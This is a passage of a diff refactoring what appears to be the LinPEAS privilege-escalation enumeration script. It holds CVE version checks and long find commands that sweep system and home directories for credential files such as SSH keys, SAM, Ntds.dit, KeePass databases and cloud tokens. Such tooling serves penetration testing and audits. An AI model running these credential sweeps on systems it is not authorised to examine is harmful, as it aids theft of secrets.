VULN_CVE_2019_5736="$(echo_no)" + if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1893" ]; then VULN_CVE_2019_5736="Yes" fi } checkContainerExploits() { - VULN_CVE_2019_5021="`echo_no`" + VULN_CVE_2019_5021="$(echo_no)" if [ -f "/etc/alpine-release" ]; then alpineVersion=$(cat /etc/alpine-release) - if [ "`echo \"$alpineVersion\" | sed 's,\.,,g'`" -ge "330" ] && [ "`echo \"$alpineVersion\" | sed 's,\.,,g'`" -le "360" ]; then + if [ "$(echo $alpineVersion | sed 's,\.,,g')" -ge "330" ] && [ "$(echo $alpineVersion | sed 's,\.,,g')" -le "360" ]; then VULN_CVE_2019_5021="Yes" fi fi @@ -965,25 +1004,25 @@ print_title "Basic information" printf $LG"OS: "$NC (cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," printf $LG"User & Groups: "$NC -(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$idB,${SED_RED},g" +(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$idB,${SED_RED},g" printf $LG"Hostname: "$NC hostname 2>/dev/null printf $LG"Writable folder: "$NC; echo $Wfolder if [ "$DISCOVER_BAN_GOOD" ]; then - printf ${YELLOW}"[+] $DISCOVER_BAN_GOOD\n"$NC + printf $YELLOW"[+] $DISCOVER_BAN_GOOD\n$NC" else - printf $RED"[-] $DISCOVER_BAN_BAD\n"$NC + printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" fi if [ "$SCAN_BAN_GOOD" ]; then - printf ${YELLOW}"[+] $SCAN_BAN_GOOD\n"$NC + printf $YELLOW"[+] $SCAN_BAN_GOOD\n$NC" else - printf $RED"[-] $SCAN_BAN_BAD\n"$NC + printf $RED"[-] $SCAN_BAN_BAD\n$NC" fi -if [ "`command -v nmap 2>/dev/null`" ];then +if [ "$(command -v nmap 2>/dev/null)" ];then NMAP_GOOD=$GREEN"nmap${BLUE} is available for network discover & port scanning, you should use it yourself" - printf ${YELLOW}"[+] $NMAP_GOOD\n"$NC + printf $YELLOW"[+] $NMAP_GOOD\n$NC" fi echo "" echo "" @@ -993,7 +1032,7 @@ echo "" ########################################### if [ "$PORTS" ]; then if [ "$SCAN_BAN_GOOD" ]; then - if [ "`echo -n $PORTS | sed 's,[0-9, ],,g'`" ]; then + if [ "$(echo -n $PORTS | sed 's,[0-9, ],,g')" ]; then printf $RED"[-] Err: Symbols detected in the port, for discovering purposes select only 1 port\n"$NC; printf ${BLUE}"$HELP"$NC; exit 0 @@ -1027,7 +1066,7 @@ elif [ "$IP" ]; then fi -if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ] || [ "`echo $CHECKS | grep IntFiles`" ] || [ "`echo $CHECKS | grep SofI`" ]; then +if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks || echo $CHECKS | grep -q IntFiles || echo $CHECKS | grep -q SofI; then ########################################### #----------) Caching Finds (--------------# ########################################### @@ -1036,148 +1075,160 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ] || [ "`echo $CHECKS | grep #Get home - HOMESEARCH="/home/ /Users/ /root/ `cat /etc/passwd 2>/dev/null | grep "sh$" | cut -d ":" -f 6 | grep -Ev "^/root|^/home|^/Users" | tr "\n" " "`" - if [ ! "`echo \"$HOMESEARCH\" | grep \"$HOME\"`" ] && [ ! "`echo \"$HOMESEARCH\" | grep -E \"^/root|^/home|^/Users\"`" ]; then #If not listed and not in /home, /Users/ or /root, add current home folder + HOMESEARCH="/home/ /Users/ /root/ $(cat /etc/passwd 2>/dev/null | grep "sh$" | cut -d ":" -f 6 | grep -Ev "^/root|^/home|^/Users" | tr "\n" " ")" + if ! echo "$HOMESEARCH" | grep -q "$HOME" && ! echo "$HOMESEARCH" | grep -qE "^/root|^/home|^/Users"; then #If not listed and not in /home, /Users/ or /root, add current home folder HOMESEARCH="$HOME $HOMESEARCH" fi - GREPHOMESEARCH=`echo "$HOMESEARCH" | sed 's/ *$//g' | tr " " "|"` #Remove ending spaces before putting "|" + GREPHOMESEARCH=$(echo "$HOMESEARCH" | sed 's/ *$//g' | tr " " "|") #Remove ending spaces before putting "|" CONT_THREADS=0 # FIND ALL KNOWN INTERESTING SOFTWARE FILES - FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \"system.d\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" -o -name \".mozilla\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_BIN=`eval_bckgrd "find /bin -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_CACHE=`eval_bckgrd "find /.cache -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_CDROM=`eval_bckgrd "find /cdrom -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" 